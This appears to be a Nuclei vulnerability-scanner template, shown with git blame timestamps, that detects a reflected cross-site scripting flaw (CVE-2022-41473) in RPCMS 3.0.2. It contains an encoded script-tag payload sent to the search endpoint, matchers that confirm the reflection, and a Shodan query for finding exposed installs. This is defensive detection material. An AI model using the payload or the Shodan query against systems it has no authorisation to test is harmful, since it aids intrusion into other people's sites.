2022-10-17 04:51:54 +00:00
id : CVE-2022-41473
info :
2022-10-19 21:11:27 +00:00
name : RPCMS 3.0.2 - Cross-Site Scripting
2022-10-17 04:51:54 +00:00
author : arafatansari
severity : medium
description : |
2022-10-19 21:11:27 +00:00
RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-17 04:51:54 +00:00
reference :
- https://github.com/ralap-z/rpcms/issues/1
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-41473
2022-10-17 11:14:50 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-41473
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.0332
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.9008
2022-10-17 04:51:54 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-10-17 04:51:54 +00:00
shodan-query : http.html:"RPCMS"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : 'rpcms'
product : 'rpcms'
2022-10-17 07:28:48 +00:00
tags : cve,cve2022,rpcms,xss
2022-10-17 04:51:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-17 05:37:45 +00:00
- method : GET
path :
- "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-10-17 04:51:54 +00:00
matchers-condition : and
matchers :
2022-10-17 05:37:45 +00:00
- type : word
part : body
words :
- '<script>alert(document.domain)</script>'
- 'rpcms'
condition : and
- type : word
part : header
words :
- "text/html"
2022-10-17 04:51:54 +00:00
- type : status
status :
- 200